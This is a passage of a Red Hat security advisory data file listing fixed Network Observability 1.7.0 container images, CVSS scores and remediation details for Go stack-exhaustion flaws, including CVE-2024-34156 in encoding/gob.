"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion", }, { cve: "CVE-2024-34156", cwe: { id: "CWE-674", name: "Uncontrolled Recursion", }, discovery_date: "2024-09-06T21:20:09.377905+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310528", }, ], notes: [ { category: "description", text: "A flaw was found in the encoding/gob package of the Golang standard library. Calling Decoder.Decoding, a message that contains deeply nested structures, can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.", title: "Vulnerability description", }, { category: "summary", text: "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability in Go's `encoding/gob` package is of high severity because it exposes applications to potential Denial of Service (DoS) attacks through stack exhaustion. Since `gob` relies on recursive function calls to decode nested structures, an attacker could exploit this by sending crafted messages with excessively deep nesting, causing the application to panic due to stack overflow. This risk is particularly important in scenarios where untrusted or external input is processed, as it can lead to system unavailability or crashes, undermining the reliability and availability of services.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34156", }, { category: "external", summary: "RHBZ#2310528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310528", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34156", url: "https://www.cve.org/CVERecord?id=CVE-2024-34156", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34156", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34156", }, { category: "external", summary: "https://go.dev/cl/611239", url: "https://go.dev/cl/611239", }, { category: "external", summary: "https://go.dev/issue/69139", url: "https://go.dev/issue/69139", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3106", url: "https://pkg.go.dev/vuln/GO-2024-3106", }, ], release_date: "2024-09-06T21:15:12.020000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", 